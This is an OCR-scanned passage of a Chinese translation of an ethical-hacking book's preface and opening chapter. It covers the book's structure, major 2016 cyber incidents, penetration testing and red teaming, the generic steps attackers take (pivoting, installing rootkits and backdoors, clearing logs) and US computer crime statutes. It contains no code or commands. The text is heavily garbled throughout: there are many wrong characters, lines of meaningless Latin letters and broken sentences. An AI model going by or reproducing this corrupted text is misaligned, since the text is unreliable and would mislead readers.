全 新 的 内 容 ， 同 时 对 其 他 章节 的 内 容 也 进行 了 更 新 。 

本 书 第 部 分 介绍 打 赢 安全 战 需要 的 所 有 工具 和 技术 , 使 你 通 透 理解 更 高 级 的 主 
题 。 该 部 分 节奏 明快 ， 无 论 是 初出 茅 让 的 亲手， 还 是 想 将 安全 技能 提高 到 新 水 平 的 
专业 人 员 ， 都 必须 掌握 其 中 的 知识 点 。 第 I 部 分 的 内 容 包括 

。 HWE BETREE ANERE 
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在 实施 任何 类 型 的 正义 黑客 行动 前 应 该 了 解 的 一 些 环 手 道德 问题 
编程 生存 技能 ， 这 是 灰 帽 黑客 编写 漏洞 攻击 程序 或 审查 源 代码 必 备 的 技能 
模糊 测试 ， 这 是 挖掘 零 日 漏洞 的 利器 

逆 癌 工程 ， 这 是 剖析 恶意 软件 或 研究 漏洞 的 必 有 备 技能 

软件 定义 的 无 线 电 

第 II 部 分 从 业务 角度 分 析 黑 客 攻击 。 不 管 你 因为 爱好 还 是 谋生 而 从 事 黑客 攻击 ， 

部 分 的 内 容 都 适合 你 阅读 。 如 果 你 是 一 位 资深 黑客 ， 该 部 分 的 提示 将 让 你 功力 倍 
"^ 该 部 分 介绍 一 些 让 道德 黑客 合法 赚钱 的 软 技能 : 

e 如 何 进入 渗透 测试 行当 

e 通过 红 队 改善 企业 的 安全 态势 

e 适用 于 启动 阶段 的 紫 队 

e 介绍 Bug 和 黄金 计 划 ， 讲 述 如 何以 合乎 道德 的 方式 通过 得 找 漏洞 获得 货 : 

第 II 部 分 讨论 开发 程序 来 攻击 系统 漏洞 所 需 的 技能 。 其 他 书籍 都 介绍 过 此 类 主 
题 ， 但 旧式 漏洞 攻击 程序 到 现在 已 经 过 时 ， 不 再 奏效 。 因 此 ， 该 部 分 将 更 新 内 容 ， 
介绍 如 何 突破 系统 保护 。 该 部 分 介绍 的 主题 如 下 : 

e 如 何在 不 使 用 漏洞 攻击 程序 的 情况 下 获得 shell 访 问 权 限 
基本 和 高 级 Linux 漏 洞 攻击 程序 
基本 和 高 级 Windows 漏 洞 攻击 程序 
使 用 PowerShell 攻 击 系 纺 漏 洞 
现代 Web 漏 洞 攻击 

e 使 用 补丁 开发 漏洞 攻击 程序 

第 IV 部 分 分 析 高 级 恶意 软件 。 在 很 多 方面 ， 这 是 网 络 安全 领域 最 高 级 的 主题 。 
在 网 络 战 中 ， 悉 意 软件 扮演 着 冲锋 陷 阵 的 角色 。 该 部 分 介绍 用 于 执行 恶意 软件 分 析 
所 需要 的 工具 和 技术 。 该 部 分 介绍 的 主题 如 下 : 

e 分 析 移 动 恶意 软件 

e 分 析 最 新 的 勒索 软件 

e 分 析 ATM 恶 意 软 件 

e 使 用 下 一 代 蜜 钢 在 网 络 上 查找 高 级 攻击 者 和 恶意 软件 

第 V 部 分 讨论 物 联网 (Internet of Things，IoT) 攻 击 主题 。 物 联网 会 受到 攻击 ， 其 
中 的 漏洞 会 被 人 利用 。 该 部 分 介绍 的 主题 如 下 : 

e 受到 攻击 的 物 联 网 

e lr NX A 

e Jui NIXUS 

e 分 析 针 对 物 联网 设备 的 恶意 软件 

名望 你 能 体会 到 本 书 呈现 的 新 内 容 的 价值 ,并 在 阅读 新 章节 的 过 程 中 享受 乐趣 。 


Bl å 


如 采 你 刚 进 入 网 络 安全 领域 ， 或 夕 更 进一步 深刻 理解 道德 黑客 攻击 主题 ， 本 书 将 是 


你 的 民 师 益友 。 

” 注意: 为 确保 你 正确 配置 系统 ， 从 而 执行 实验 步 又， 本 书 配套 网 站 提供 了 
所 需 ay) OF 要 获得 实验 材料 和 勘误 信息 "E "T ij 问 GitHub 库 
https://github.com/GrayHatHacking/GHHv5 ， 也 可 访问 出 版 商 的 网 站 
Www.Imhprofessional.com。 另 外 ， 还 可 扫描 本 书 封底 的 二 维 码 来 下 载 它 们 。 
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本 书 的 目的 不 是 介绍 如 何 进行 非法 的 、 不 道德 的 破坏 活动 ， 而 是 引导 灰 帽 黑客 
们 完善 并 提高 目 己 的 技能 ， 以 便 更 好 地 抵御 秋 意 攻击 。 


本 章 将 讨论 以 下 主题 : 

e JERA, AEI FARAR 
e 灰 幅 黑客 的 修炼 之 道 

e 网 络 安 全 相关 法 律 的 演变 


1.1 了 解 政 人 


如 果 我 们 对 问题 的 理解 程度 还 不 及 问题 制造 者 ， 就 无 从 解决 问题 。 
阿尔 伯 特 。 爱 因 斯坦 


我 们 未 来 遇 到 的 安全 问题 将 比 当前 和 面 对 的 问题 更 加 复杂 。 我 们 已 经 生活 在 一 个 
高 度 依赖 于 信息 技术 的 世界 中 ， 网 络 安全 对 金融 市 场 、 选 举 、 家 性 生活 及 医疗 保健 
等 诸多 领域 都 将 产生 深远 影响 。 随 着 信息 技术 的 进步 ， 安 全 威胁 也 将 随 之 增加 。 一 
方面 , 城市 乔 能 化 程度 在 人 不断 提 高 ， 目 动 殴 驶 设备 进入 大 规模 投产 阶段 ， 男 一 方面 ， 
医院 被 勒索 要 求 支 付 赎金 、 电 网 遭 关 停 、 知 识 产 权 和 商业 机 密 被 甸 ， 网 络 安全 犯罪 
成 为 一 个 “ 逢 有 劲 友 展 ”的 行业 。 为 了 抵御 攻击 ， 保 护 资 产 ， 我 们 必须 了 解 攻 击 者 ， 
摸 清 攻击 者 的 运作 方式 。 了 解 攻击 模式 是 安全 防御 最 具 挑 战 性 的 方面 ， 通 过 了 解 攻 
击 者 的 思维 模式 及 运作 方式 ， 可 以 更 好 地 对 组 织 的 安全 防御 做 出 调整 ， 以 便 更 好 地 
防范 新 兴 的 安全 威胁 和 安全 态势 。 那 么 ， 如 何 才 能 防御 那些 未 知 的 威胁 呢 ? 

EM ee ; BAB AS AACR 
的 网 络 安全 威胁 ， 唯 一 的 途径 是 做 到 对 安全 行业 了 如 指 掌 ， 深入 学 习 “ 进 攻 性 安全 
(Offensive c" z 理念 以 及 可 测试 的 和 可 改进 的 防御 手段 。 恶 意 攻击 者 精通 如 
何 破 坏 系 统 和 网 络 的 安全 性 ， 因 此 ， 了 解 攻击 者 的 各 种 手段 ， 对 于 阻止 攻击 行为 和 
制定 防御 策略 是 到 天草 要 的 。 只 有 学 习 攻 击 之 术 ， 才 能 真正 抵御 强 敌 。 


1.1.1 当前 的 安全 状况 
Technology( 技 术 ) 既 可 以 造福 于 人 类 ， 也 可 被 用 于 那 恶 目的 。 同 样 一 种 技术 ， 既 
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可 以 提升 组 织 和 国家 的 整体 生产 效率 ， 也 可 能 被 坏人 利用 ， 而 用 于 偷盗 、 偷 才 或 者 
做 其 他 坏事 。 这 种 “ 双 刃 人 齐 ” 特 性 也 意味 者 ， 为 了 协助 我 们 提高 生活 水 平 而 创造 的 
技术 ， 有 时 反而 会 对 我 们 造成 损害 。 那 些 用 来 保护 人 次 福 社 的 技术 也 可 能 成 为 破坏 
利 顷 。 则 在 保护 我 们 的 工具 可 能 被 坏人 利用 ， 拿 来 攻击 我 们 。 犯 罪 团伙 也 在 大 规 
模 运 用 各 项 技术 来 谋求 巨大 的 非法 收益 ， 每 年 给 全 球 经 济 带 来 的 损失 约 为 4 500 亿 
美元 。 

要 “重视 ”敌人 人。 恶意 攻击 者 的 动机 各 不 相同 ， 花 招 百 变 。 攻 击 方式 也 变 得 更 
具有 针对 性 ， 且 日 趋 复杂 。 在 这 种 趋势 下 ， 世 界 上 及 生 了 海量 的 安全 事件 ， 以 下 是 
几 个 比较 典型 的 案例 : 

e 2016 年 2 月 ， 攻 击 者 盯 上 J 了 全 球 银 行 转账 系统 SWIFT(Society for Worldwide 
Interbank Financial Telecommunication)。 人 退 过 欺骗 手段 ， 从 位 于 纽约 的 联邦 
储备 银行 ， 将 孟加拉 国 银行 账户 的 8 100 万 美元 转 入 菲律宾 的 几 个 账户 后 ， 
ERMAN. BIEN KS BU BAR IE E. 

e 2016 年 7 月 ， 美 国民 主 和 党 全 国 委 员 会 (ODNC) 受 到 黑客 攻击 ， 办 公 电 子 邮 件 在 
维基 解密 上 泄露 。 攻 击 来 源 于 两 个 俄罗斯 攻击 团队 。 美 国 中 央 情 报 局 (CIA) 
认为 ， 俄 罗斯 的 两 个 组 织 介 入 2016 年 的 美国 总 统 选举 ， 上 和 在 阻止 希拉 里 入 
EAS. 

e 2016 年 10 月 , 数 百 万 不 安全 的 物 联 网 摄像 机 和 数字 视频 录像 机 (DVR) 对 DNS 
提供 商 Dyn 及 起 了 分 布 式 拒绝 服务 攻击 (Distributed Denial-of-Service , 
DDoS)。 在 源 代码 发 布 一 个 月 后 ，Mirai 僵尸 网 络 接连 被 用 于 攻击 Twitter、 
Netflix, Etsy, GitHub, SoundCloudZllSpotifySs E 4 IJ v] 2 ARS F o 

e 2016:F12H, 乌克兰 冯 痢 基辅 由 于 受到 网 络 攻击 ， BURIAL IBEX S 
电 事 件 ， 超 过 22.5 万 人 的 生活 受到 影响 。 攻 击 者 利用 工业 控制 系统 (Industrial 
Control Systems，ICSSs) 的 漏 调 ,破坏 配 电 设备 ,致使 恢复 供电 变 得 十 分 困难 。 
这 起 事件 与 来 自 于 俄罗斯 的 攻击 组 织 有 关 。 

近年 来 ， 美 国联 邦 调查 局 (Federal Bureau of Investigation，FBD、 美 国 国土 安 全 
部 (Department of Homeland Security, DHS). 索尼 娱乐 (Sony Entertainment). Equifax. 
美国 联邦 存款 保险 公司 (Federal Deposit Insurance Corporation，FDIC) 和 美国 国税 局 
(Internal Revenue Service，IRS) 都 曾 出 现 重 大 泄密 事件 ， 甚 至 出 现 了 多 次 大 规模 数据 
泄密 。 好 羔 翅 长 老 会 医疗 中 心 (Hollywood Presbyterian Medical Center) 48 PRAIA EF 
攻击 ， 文 付 了 比特 币 赎 金 才 恢复 运营 。 网 络 攻 击 造 成 的 影响 程度 不 同 ， 平 均 每 次 攻 
击 会 给 相 天 组 织 币 来 400 万 美元 的 损失 ; 但是， 有 些 可 能 会 造成 数 亿美 元 的 损失 。 

安全 行业 在 不 断 发 展 。 为 促进 “网 络 日 防御 ”(Self-Healing Networks) 而 生产 的 
多 项 产品 在 首届 DARPA 网 络 挑战 赛 (DARPA Cyber Grand Challenge) 上 同 场 竞 争 。 基 
于 机 器 学 习 的 恶意 软件 解决 方案 正在 从 代 基于 签名 的 解决 方案 。 集 成 安全 运营 中 心 
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(Integrated Security Operations Center，ISOC) 促 进 了 安全 领域 的 协作 。 网络 安 全 会 议 、 
尝 位 诛 程 和 搭 训 也 日 蔓 盛 行 。 安 全 行业 正 推出 新 的 工具 、 创 意 和 协作 方式 ， 来 应 对 
逐渐 增多 的 网 络 攻 击 。 

攻击 者 的 动机 多 种 多 样 。 有 些 想 谋 取经 济 利益 ， 追 求 利益 最 大 化 ， 有 些 则 出 于 
政治 目的 ， 想 削弱 政府 领导 力 或 试图 盗 取 政府 机 蜜 材料 ; 有 些 出 于 社会 原因 ， 即 所 
谓 的 黑客 行为 主义 者 (Hactivisb; 有 些 则 是 因为 愤怒 ， 只 是 想 报 复 或 泄愤 。 


1.1.2 WADE 


当 发 生 攻 击 时 ， 要 了 予以 认真 分 析 。 攻 击 者 是 如 何 阁 入 的 ?他 们 在 网 络 上 潜伏 了 
BZA? 如 何 阻 止 ? 攻击 行为 往往 十 难以 检测 的 ， 入 侵 者 可 能 会 潜伏 很 长 时 间 。 道 德 
黑客 可 以 帮助 组 织 了 解 如 何 识别 正在 进行 或 即将 实施 的 攻击 ， 以 便 组 织 更 好 进行 防 
御 以 保护 组 织 资产 。 有 些 攻击 很 明显 ， 拒 绝 服务 和 勒索 软件 攻击 往往 来 势 测 济 。 然 
而 ， 大 多 数 攻 击 都 是 偷偷 质 措 进行 的 ， 尽 力 避 开 各 种 侦 测 手段 ， 尽 量 不 被 安 全 设备 
和 人 负 员 安全 的 人 员 注 意 到 ， 神 不 知 鬼 不 觉 地 偷 覆 得手。 因此 ， 了 解 不 同类 型 的 攻击 
方式 很 重要 ， 只 有 这 样 才能 正确 地 识别 和 阻止 攻击 。 

有 些 攻 击 是 有 征兆 的 ， 可 以 作为 攻击 即将 友 生 的 管 告 ， 例 如， 看 到 ping 扫 插 后 
ARARIM J hin At, RAHA OAT aR, AWE ATES. SEARS 
CAAA GW, LLC m SAUD TRE A 3S SP E I1] EE ORE URL DUI ZR 
统 的 安全 性 。 安 全 工具 有 可 能 会 失效 ， 很 多 工具 也 有 可 能 锐 轻 易 统 过 ， 因 此 ， 仪 仅 
依 荐 安全 工具 不 足以 市 来 真正 的 安全 。 

归根 到 夺 ， 黑 和 客 工 具 也 就 古 一 些 IT 工 具 ， 这 些 工具 既 可 用 于 正当 (防御 ) 用 途 ， 
也 可 以 用 于 恶意 (攻击 ) 用 途 。 这 些 工具 集 是 相同 的 ， 区 别 在 于 使 用 这 些 工 具 的 目的 。 
轧 德 黑客 了解 这 些 工 具 的 用 法 ， 也 清楚 攻击 方式 ， 这 有 助 于 他 们 更 好 地 实施 防御 。 
本 书 将 介绍 很 多 黑客 工具 ， 第 7 章 和 第 8 章 将 专门 介绍 有 助 于 识别 攻击 的 工具 ， 其 他 
nue sar i. 


1.2 7A BE Ze 


组 织 机 构 为 了 清晰 地 了 解 目 身 安 全 态势 及 风险 状况 的 真实 情况 ， 往 往 会 雇用 道 
德 黑 客 ， 也 束 是 渗透 测试 人 员 (Penetration Tester)， 对 组 织 网 络 安 全 进行 模拟 攻击 ; 
渗透 测试 人 员 使 用 与 恶意 攻击 者 相同 的 工具 和 方法 ， 在 受 控 且 安全 的 方式 下 进行 渗 
透 测试 工作 ， 以 便 组 织 可 以 更 好 地 了 解 入 侵 者 如 何 潜入 环境 、 如 何在 环境 中 隐匿， 
以 及 如 何 盗 取 组 织 的 数据 。 组 织 还 可 以 确定 攻击 造成 的 影响 ， 并 识别 弱点 
(Weakness)。 活 透 测试 这 种 模拟 攻击 可 以 帮助 组 织 检验 安全 防御 和 持续 监测 工具 的 
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有 效 性 ， 而 后 ， 组 织 可 以 根据 经 验 教训 改进 防御 案 略 。 

渗透 测试 工作 的 范围 和 深度 远 远 大 于 汤 洞 扫描 (Vulnerability Scanning). Eini] 
扫描 过 程 中 ， 一 般 是 使 用 自动 化 扫描 产品 在 一 个 了 下地 址 范围 内 探测 端口 和 服务 。 大 
多 数 此 类 工具 收集 系统 和 软件 的 相关 信息 ,将 这 些 信 息 与 已 知 漏洞 进行 关联 和 匹配 。 
扫描 工作 结束 后 ， 会 提交 一 个 漏洞 列表 作为 工作 成 果 ， 但 往往 不 会 深入 说 明 这 些 漏 
洞 对 当前 环境 的 影响 。 而 在 渗透 测试 过 程 中 ， 渗 透 测试 人 员 会 实施 模拟 攻击 ， 以 揭 
示 可 能 对 业务 安全 产生 的 影响 。 渗 透 测 试 人 员 不 仅 要 创建 代码 和 配置 漏洞 的 列表 ， 
还 要 以 恶意 攻击 者 的 视角 实施 受 控 的 攻击 。 渗 透 测试 人 员 将 一 系列 进攻 方式 组 合 在 
一 起 ， 来 展示 恶意 攻击 者 如 何 进 入 环境 ， 在 环境 中 隐匿 、 控 制 系统 和 数据 ， 进 而 次 
窃 数据 。 渗 透 测试 人 员 将 利用 人 代码、 用户、 流程 、 系 统 配置 或 物理 安全 的 弱点 ， 来 
模拟 攻击 者 如 何 利用 弱点 并 进行 破坏 。 这 包括 创建 概念 验证 (Proof-of-Concept，PoC) 
攻击 ， 使 用 社交 工程 学 (Social Engineering) 扩 术 、 援 锁 以 及 复制 物理 访问 标识 卡 等 各 
种 手段 。 

很 多 情况 下 ， 渗 透 测试 揭示 了 组 织 可 能 失去 对 系统 的 控制 权 ， 甚 至 有 可 能 丧失 
对 数据 的 控制 权 。 在 一 些 接 受 法 律 法 规 强 监 管 的 行业 环境 中 ， 周 期 性 地 开展 渗透 测 
试 工作 尤为 重要 。 通 过 渗透 测试 ， 可 以 证 明 安 全 控制 措施 的 监管 合 规 性 ， 也 有 助 于 
确定 安全 任务 的 优先 级 排序 。 

基于 对 环境 信息 的 了 解 程度 ， 可 以 实施 多 种 类 型 的 渗透 测试 。 如 果 事 先 对 环境 
一 无 所 知 ， 可 以 执行 黑 盒 测 试 GBlack Box Tesb 工 作 。 如 果 对 环境 了 如 指 掌 ， 甚 至 已 
经 掌握 IP 地 址 方案 和 URL 等 详细 信息 ， 可 以 进行 白 盒 测试 (White Box Tesb 工 作 。 如 
果 开 始 阶段 不 了 解 全 部 环境 ， 在 渗透 到 环境 中 逐渐 了 解 到 一 些 信息 后 ， 可 以 更 有 效 
地 开展 工作 ， 则 可 开展 灰 盒 测试 (Gray Box Test) 工 作 。 

此 外 , 渗透 测试 具有 多 样 性 ， 其 特性 和 持续 时 间 也 大 不 相同 。 可 专门 针对 位 置 、 
业务 部 门 、 法 律 法 规 要 求 或 产品 进行 专项 评 佑 。 用 于 攻击 散 入 式 设 备 的 方法 与 红 队 
评估 (Red Team) 中 使 用 的 方法 是 不 同 的 ( 稍 后 将 介绍 这 两 种 方法 )。 本 书 描述 各 种 攻击 


方式 ， 从 AITM 的 恶意 软件 攻击 到 物 联网 攻击 ， 并 展示 各 种 可 供 道德 黑客 使 用 的 令 人 
看 迷 的 专用 技术 。 


1.2.1 ”模拟 攻击 


本 书包 含 多 种 攻击 信息 ， 泣 兹 多 个 道德 黑客 攻击 技术 领域 。 此 处 将 简要 介绍 刀 
德 黑 客 的 行动 过 程 ， 更 详细 的 讨论 参见 后 续 划 市。 

在 执行 模拟 攻击 时 ， 与 测试 团队 和 利 荔 相关 方 维 护 民 好 的 沟 角 十 分 午 要 。 测 试 
人 员 需 要 研究 测试 目标 的 扩 术 环境 , 在 与 相关 人 员 交 流 后 , 进行 规划 并 设计 测试 方 条 。 
业务 的 性 质 是 什么 ?组 织 使 用 了 哪 类 敏感 信息 ?请 务必 从 以 下 多 个 方面 进行 考虑 : 

e 确保 每 个 人 痢 了 解 评 佑 的 重点 。 和 是 专注 于 针对 信用 卡 数据 的 合 规 性 渗透 测 
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i? 还 是 公司 要 专注 于 测试 检测 能 力 ? 抑或 测试 即将 有 布 的 新 产品 ? 

与 利益 相关 方 以 及 其 他 成 员 之 间 建 立 起 安全 的 交流 渠道 ,保护 好 测试 工具 的 
输出 结 末 和 测试 报告 。 骨 第 还 可 以 使 用 加 密 的 电子 邮件 系统 ,全 力 确保 文档 
库 的 安全 性 。 如果 有 人 要 远程 访问 测试 或 报告 环境 , 或 俘 看 电子 邮件 或 文档 
库 ， 则 震 要 进行 多 因 系 里 份 认证 。 

确定 评估 范围 ， 形 成 书面 材料 并 与 评估 团队 和 利 荔 相关 方 开 展 讨 论 。 例 如 ， 
社区 工程 学 古谷 可 作为 模拟 攻击 方式 ?对 网 站 的 评估 要 达到 多 深 的 程度 ? 
务必 询问 并 探 香 “脆弱 系统 ”。 所 谓 脆弱 系统 ， 和 是 指 系统 最 近 无缘 无 故地 天 
来 解决 可 能 出 现 的 问题 。 

问 利益 相关 方 或 团队 详细 摘 述 测试 的 方法 。 讨 论 并 约定 测试 规则 。 如 末 检 测 
到 攻击 测试 , 相关 团队 是 否 应 该 尝试 阻止 模拟 攻击 ?哪些 人 应 该 了 解 测试 的 
信息 ?对 于 发 现 模拟 测试 活动 的 用 尸 应 该 如 何 告知 ? 

保留 测试 活动 的 审计 记录 。 用 日 志和 文档 记录 下 所 有 的 测试 活动 。 执 行 渗透 
测试 时 ， 有 时 会 肥 现 ,测试 人 员 并 非 第 一 个 潜入 系统 的 人 ， 可 能 有 真正 的 黑 
客 正 在 实施 人 破坏 行动 。 务 必 商 梭 并 确认 开始 日 期 、 结 束 日 期 和 冻结 期 
(Blackout Period). 


下 面 简 单列 出 渗透 测试 的 典型 步骤 ， 后 续 章 节 将 进一步 详细 分 析 。 

(1) 收集 公开 资源 情报 (Compile Open Source Intelligence，OSINT)。 与 目标 保 
持 零 接触， 同时 尽 可 能 多 地 收集 有 关 目 标的 公开 信息 。 收 集 OSINT 又 称 为 被 动 扫描 
(Passive Scanning)， 上 有 具体 项 目 如 下 : 


社交 网 站 

在 线 数据 库 
Google、LinkedIn 等 
垃圾 搜寻 (Dumpster Diving) 


(2) 主动 扫描 和 枚 举 。 使 用 扫描 工具 碍 找 目标 公共 接口 ， 这 些 工 具 包 括 ; 


网 络 地 图 (Network Mapping) 

系统 提示 信息 捕获 (Banner Grabbing) 
战争 拨号 (War Dialing) 技 术 

DNS 区 域 传送 (DNS Zone Transfers) 

流量 嗅 探 (Traffic Sniffing) 技 术 

无 线 战 争 驾 驶 (Wireless War Driving) 技 术 


(3) HARE RA. MRE A tr KAVA Ware: 


操作 系统 类 型 和 补丁 版 本 
应 用 程序 和 补丁 版 本 
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e FPN Sig A 

e 运行 的 服务 

e 用 户 账户 

(4) 选择 目标 系统 。 确 定 硅 干 最 终 疯 试 目标 。 

(5) 利用 他 人 未 发 现 的 漏 润 。 针 对 可 颖 漏洞 使 用 合适 的 攻击 工具 ， 肌 注意 以 下 
要 点 : 

e 一 些 工 具 可 能 无 法 测试 出 特定 问题 

e 一 些 工具 可 能 会 终止 东 项 服务 ， 甚 全 导致 服务 堪 宕 机 

e 一 些 工 具 可 能 会 测试 成 功 

(6) 提升 权限 。 提 升 权 限 ， 获 得 更 多 控制 权限 。 

e 获取 toot 或 管理 员 权 限 

e 使 用 破解 的 口令 Password) 进 行 未 授权 访问 

e 执行 续 冲 区 洲 出 攻击 ， 以 获取 本 地 以 及 远程 控制 

C) 保留 访问 权限 。 在 这 一 步 中 ， 通 第 需要 安 朔 软件 或 更 改 配置 ， 确 保 下 次 还 
可 获得 访问 权限 。 

(8) 记录 和 报告 。 记 录 找 到 的 漏洞 、 找 到 漏洞 的 方式 、 使 用 的 工具 、 可 利用 的 
漏洞 、 测 试 活 动 的 时 间 轴 以 及 成 功 与 否 。 最 好 即刻 报告 、 周 期 性 收集 证 据 并 做 记录 。 


注意 : 本 书包 含 对 各 种 攻击 方法 的 详细 描述 。 


MER ARS AACE 


Fi jt A ER AER e 

(D) MEA. MER REM ANWET MiB. TKR EEA. A 
基本 的 原则 ， 没 有 特定 的 攻击 目标 ， 而 安全 团队 对 于 即将 遭受 的 攻击 一 无 所 知 。 

(2) 使 用 中 间 跳 板 。 不 轧 德 黑客 不 使 用 目 己 的 系统 ， 而 是 从 中 间 跳 板 ( 为 一 个 系 
统 ) 发 起 攻击 ， 当 检测 到 攻击 时 ， 也 很 难 跟 踊 到 真正 的 攻击 者 。 这 些 中 则 跳板 系统 通 
前 也 是 攻击 的 党 害 者 。 

(3) 接 下 来 ， 攻 击 者 将 执行 前 面 朱 述 的 部 分 渗透 测试 步 又 。 

e 收集 公开 资源 情报 
主动 扫 插 和 枚 举 技 术 
指纹 信息 识别 技术 
选择 目标 系统 
利用 他 人 未 发 现 的 漏洞 
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e 权限 提升 技术 

(4) 保留 访问 权限 。 需 要 上 传 并 安装 Rootkit、 后 门 、 特 洛 伊 木马 感染 后 的 应 用 
程序 和 /或 僵尸 程序 ， 以 确保 攻击 者 以 后 可 重新 进行 访问 。 

(5) HERA. vU BA P: 

e 清理 事件 日 志和 审计 日 志 

e 隐藏 上 传 的 文件 

e 隐藏 允许 访问 者 重新 获取 访问 权 的 活动 进程 

e 共用 安全 软件 和 系统 日 忘 的 告 党 信息 ， 以 隐 妃 人 恶意 进程 和 动作 

(6) 加 固 系统 。 系 纺 被 攻 殉 后 ， 攻 击 者 可 能 会 修复 公开 漏洞 ， 以 阻止 其 他 的 攻 
击 者 再 次 利用 此 系统 。 

攻击 者 将 利用 他 们 攻克 并 控制 的 系统 来 满足 目 己 的 各 种 不 法 行为 需求 。 有 时 候 ， 
攻击 者 会 在 网 络 内 隐藏 数 月 或 数 年 ， 在 隐匿 期 间 ， 对 受害 者 的 环境 进行 深入 研究 。 
此 外 ， 攻 击 者 还 经 党 利 用 非法 攻 元 的 受 控 系统 攻击 其 他 系统 ， 人 致使 受害 者 很 难 找 到 
真正 的 攻击 源 。 


1.2.2 Ji Sn A TERR 


JETER INIT Ay Se ARS BFE PIE REA KERR RAAE 
黑客 每 年 全 少 一 次 的 渗透 测试 而 获 益 。 但 是 ， 一 旦 技术 环境 上 友 生 重大 变化 ， 将 对 安 
全 产生 负面 影响 例如， 变化 会 影 啊 操 作 系 统 或 应 用 程序 升级 ( 通 币 每 年 会 多 次 升 
级 )。 大 多 数组 织 的 技术 环境 变化 很 快 , 因此 ， 建议 采用 持续 性 的 安全 测试 。 红 队 ( 安 
全 攻击 团队 ) 演 习 和 季 撒 渗透 测试 正 变 得 越 来 越 普 所 。 

红 队 演习 退 当 事先 获取 组 织 的 正式 批准 ， 但 是 往往 秘 而 不 时。 组 织 虽 然 授 权 红 
队 进 行 测 试 ， 但 并 不 公布 红 队 的 具体 测试 时 间 点 。 很 多 红 队 评 信和 会 持续 相当 长 的 时 
间 ， 目 标 是 帮助 组 织 提 高 防御 能 为 ( 即 蓝 队 能 力 )。 红 队 测 试 通 弟 按 照 年 度 开 展 ， 通 
过 肥 布 季度 简报 、 各 关 专 项 报告 以 及 其 他 交付 物 ， 来 帮助 组 织 度 量 安 全 进展 状况 。 
当 赣 队 ( 或 安全 防御 团队 ) 友 现 被 攻击 时 ， 并 不 知道 这 征 真正 的 恶意 攻击 ， 还 是 红 队 
演习 ; 于 是 ， 鉴 队 会 局 动 应 急 程 序 。 退 过 类 似 的 场景 ， 组 织 便 进行 了 一 场 场 “ 猫 和 
老鼠 ”的 游戏 ， 轧 人 德 黑 客 可 以 帮助 安全 防御 团队 测试 并 优化 组 织 的 安全 控制 指 施 和 
事件 啊 应 能 力 。 通 第 ， 上 共有 成 熟 事 件 应 忽 啊 应 能 力 的 组 织 会 设置 红 队 。 本 书 将 在 第 7 
草 详 细 介 绍 这 个 主题 。 

很 多 组 织 全 少 每 季度 会 执行 一 次 渗透 测试 ， 这 人 允许 组 织 在 各 个 季度 选取 不 同 的 
天 注 氮 。 很 多 组 织 将 季度 渗透 测试 和 变更 官 理 流程 相 结合 ， 从 而 确 你 测试 活动 能 够 
全 面 覆 善 近期 及 生 过 变化 的 技术 环境 。 


10 


第 1 部 分 备 A 


1.3 ”网 络 安 全 相 天 法 律 的 演变 


网 络 安 全 是 一 个 复杂 的 主题 ， 网 络 相关 法 律 使 这 一 切 变 得 更 复杂 。 网 络 安全 法 
律 跨越 了 地 缘 政 治 边 界 ， 打 破 了 传统 的 治理 结构 。 如 采 网 络 攻击 跨越 多 个 国家 ， 涉 
及 分 布 在 全 球 的 僵 太 网络， 那么 该 由 哪个 政府 机 构 来 立法 和 执法 ? RISE AUG TA 
HE? 互联 网 具有 匿名 特点 ， 很 难 找到 党 事 的 个 人 或 团队 ， 这 使 得 起 诉 攻击 者 成 为 一 
个 更 大 的 难题 。 

政府 制定 的 法 律 大 多 用 于 保护 公民 的 私有 财产 。 保护 系 统 和 数据 类 型 (包括 关键 
基础 架构 、 私 有 信息 及 个 人 数据 ) 则 需要 采用 不 同 的 法 规 。 如 今 的 CEO 和 定理 层 不 仅 
需要 担心 利润 空间 、 市 场 分 析 和 并 购 之 类 的 问题 ， 也 需要 关心 安全 问题 ， 需 要 保持 
对 全 球 安全 实践 的 适度 关注 (Due Care), 熟悉 并 杂 守 政府 颁 友 的 新 的 隐私 和 信息 安全 
相关 法 规 、 承 担 引 上 友 安 全 漏洞 的 民事 及 刑事 贡 任 (包括 个 人 应 承担 的 因 示 些 安全 泄露 
所 引 友 的 贡 任 )， 并 致力 于 了 解 和 消除 各 种 信息 安全 方面 的 问题 ， 避 免 给 公司 造成 
损失 。 


理解 各 种 网 络 安全 法 

各 种 网 络 安全 法 用 于 处 理 各 种 问题 ， 例 如 禁止 在 未 获 授权 的 情况 下 访问 账户 、 
禁止 传输 代码 或 程序 来 损害 计算 机 。 无 论 计算 机 是 否 正在 使 用 ， 这 些 法 律 都 是 适用 
的 ， 以 防止 通信 (有 线 通信 、 语 音 以 及 数据 传输 ) 受 到 未 授权 访问 或 遭 到 泄露 。 一 些 
法 律 适用 于 受 版 权 保 护 的 内 容 ， 可 防止 这 些 内 容 受到 非法 访问 。 这 些 法 律 组 成 了 一 
张 法 律 法 规 网 ， 可 用 于 起 诉 网 络 安全 罪犯 。 本 节 简 要 介绍 最 著名 的 几 部 网 络 安全 
法 律 。 


1. 18 USC 1029: 访问 设备 法 案 (The Access Device Statute) 


访问 设备 法 案 的 制定 是 为 了 过 制 非 法 访问 账 尸 ， 盗 入 钱 财 、 产 品 、 服 务 以 及 其 
他 相关 犯 徘 行为 的 发 生 。 访 法案 将 占有 、 使 用 、 贩 卖 伪 造 的 、 非 法 的 访问 设备 或 设 
备 制 造 交 置 ， 以 及 其 他 相关 的 处 于 案 划 、 准 备 或 实施 状态 的 自在 非法 盗 稻 钱财 、 产 
品 及 服务 的 一 切 相关 行为 定义 为 刑事 犯 菲 ( 见 稍 后 的 解释 )。 访 法案 规 定 使 用 这 些 侵 
权 设 备 进行 欺诈 及 相关 非法 活动 将 受到 的 法 律 制裁 .18 USC 1029 的 约束 对 象 是 产生 
或 非法 获取 访问 再 证 的 行为 ， 只 与 获取 及 使 用 插 证 的 活动 相关 ， 无 天 计算 机 是 合 参 
与 。 而 下 面 讨论 的 法 律 条 球 仅 限于 计算 机 参与 的 犯 菲 活动 。 


2.18 USC 1030: 计算 机 欺诈 和 滥用 法 案 


计算 机 欺诈 和 混用 法 案 (Computer Fraud and Abuse Act，CFAA) 作 为 美国 爱国 者 
法 案 (USA PATRIOT Act) 的 修订 案 ， 是 一 部 涉及 计算 机 网 络 安全 的 重要 法 人 律 。 该 法 
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案 禁止 以 下 活动 : 未 经 授权 访问 计算 机 和 网 络 系统 ， 威 胁 发 动 网 络 攻击 进行 敲诈 翰 
索 ， 传 输 代码 或 程序 导致 计算 机 瘫痪 ， 以 及 其 他 相关 违法 犯罪 活动 。 该 法 案 针对 非 
